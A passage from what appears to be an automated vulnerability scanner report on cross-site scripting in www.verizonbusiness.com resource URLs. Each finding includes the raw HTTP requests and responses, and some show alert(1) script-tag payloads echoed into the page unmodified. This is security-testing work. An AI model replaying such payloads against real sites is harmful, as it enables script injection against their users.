Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "3d4dbfc213a05d15a8708667007248fa"
Last-Modified: Wed, 17 Nov 2010 00:22:02 GMT
Vary: User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38144
Date: Wed, 17 Nov 2010 00:22:02 GMT
Connection: close
Set-Cookie: BERT=VRID%3d8c81dcab-adee-4625-bbaf-18ae39a48692|VTID%3d101a96d7-9523-45f6-9d62-bc2d55a6f47e|SX%3d1289954522|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:46 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a2a3-111-Contact+Centers.xmlf36dc</script><script>alert(1)</script>c1ce810243</url>
...[SNIP]...

1.668. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a3-111-Contact+Centers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b94bb'%3bf4a4e8d79dc was submitted in the REST URL parameter 2. This input was echoed as b94bb';f4a4e8d79dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b94bb'%3bf4a4e8d79dc HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:05 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b94bb';f4a4e8d79dc'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.669. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a30-111-Global+Network.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f817f'%3bc9a9f097994 was submitted in the REST URL parameter 1. This input was echoed as f817f';c9a9f097994 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf817f'%3bc9a9f097994/1002a2a30-111-Global+Network.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:31 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesf817f';c9a9f097994/1002a2a30-111-Global+Network.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.670. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a30-111-Global+Network.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0dba"%3b1334ba31044 was submitted in the REST URL parameter 1. This input was echoed as b0dba";1334ba31044 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb0dba"%3b1334ba31044/1002a2a30-111-Global+Network.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:54 GMT
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesb0dba";1334ba31044/1002a2a30-111-Global+Network.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.671. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a30-111-Global+Network.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae7a8'%3b91ca4c070a5 was submitted in the REST URL parameter 2. This input was echoed as ae7a8';91ca4c070a5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/ae7a8'%3b91ca4c070a5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:06 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/ae7a8';91ca4c070a5'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.672. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a30-111-Global+Network.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fdc0</script><script>alert(1)</script>e3f72f300fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a30-111-Global+Network.xml1fdc0</script><script>alert(1)</script>e3f72f300fe HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "f2254645145f05f4023291e7cb091a13"
Last-Modified: Wed, 17 Nov 2010 00:26:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d94129d77-83c1-4c97-ac0a-b3e22db60b0b|VTID%3d7ee6de4f-e045-401d-94c8-f5029dd970f1|SX%3d1289954762|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:29:46 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:02 GMT
Content-Length: 36652

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a30-111-Global+Network.xml1fdc0</script><script>alert(1)</script>e3f72f300fe</url>
...[SNIP]...

1.673. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a31-111-Customer+Enablement.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abc6d'%3b5c3e880db51 was submitted in the REST URL parameter 1. This input was echoed as abc6d';5c3e880db51 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesabc6d'%3b5c3e880db51/1002a2a31-111-Customer+Enablement.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:41 GMT
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesabc6d';5c3e880db51/1002a2a31-111-Customer+Enablement.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.674. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a31-111-Customer+Enablement.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6458"%3b9524cc13665 was submitted in the REST URL parameter 1. This input was echoed as e6458";9524cc13665 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese6458"%3b9524cc13665/1002a2a31-111-Customer+Enablement.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese6458";9524cc13665/1002a2a31-111-Customer+Enablement.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.675. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a31-111-Customer+Enablement.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cd81</script><script>alert(1)</script>46e407fb485 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a31-111-Customer+Enablement.xml6cd81</script><script>alert(1)</script>46e407fb485 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "ee3c33e340df46fccdc0ce204100c5d4"
Last-Modified: Wed, 17 Nov 2010 00:22:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:22:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d622a35aa-b448-45c9-855f-67d527e994ed|VTID%3d050726e2-c803-42c6-bbf2-24beddc4ef27|SX%3d1289954557|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:26:21 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:37 GMT
Content-Length: 32903

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a2a31-111-Customer+Enablement.xml6cd81</script><script>alert(1)</script>46e407fb485</url>
...[SNIP]...

1.676. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a31-111-Customer+Enablement.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad95c'%3bf7019ef4f82 was submitted in the REST URL parameter 2. This input was echoed as ad95c';f7019ef4f82 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/ad95c'%3bf7019ef4f82 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:40 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/ad95c';f7019ef4f82'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.677. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a4-111-Data+and+IP+Services.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5d15"%3b6749ae997ff was submitted in the REST URL parameter 1. This input was echoed as b5d15";6749ae997ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb5d15"%3b6749ae997ff/1002a2a4-111-Data+and+IP+Services.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:21:05 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesb5d15";6749ae997ff/1002a2a4-111-Data+and+IP+Services.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.678. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a4-111-Data+and+IP+Services.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 584bb'%3b47cded357ea was submitted in the REST URL parameter 1. This input was echoed as 584bb';47cded357ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources584bb'%3b47cded357ea/1002a2a4-111-Data+and+IP+Services.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources584bb';47cded357ea/1002a2a4-111-Data+and+IP+Services.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.679. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a4-111-Data+and+IP+Services.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7877'%3b927bc5f308e was submitted in the REST URL parameter 2. This input was echoed as c7877';927bc5f308e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/c7877'%3b927bc5f308e HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40212
Date: Wed, 17 Nov 2010 00:23:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/c7877';927bc5f308e'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.680. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a4-111-Data+and+IP+Services.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84dc9</script><script>alert(1)</script>01dab82d99f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a4-111-Data+and+IP+Services.xml84dc9</script><script>alert(1)</script>01dab82d99f HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
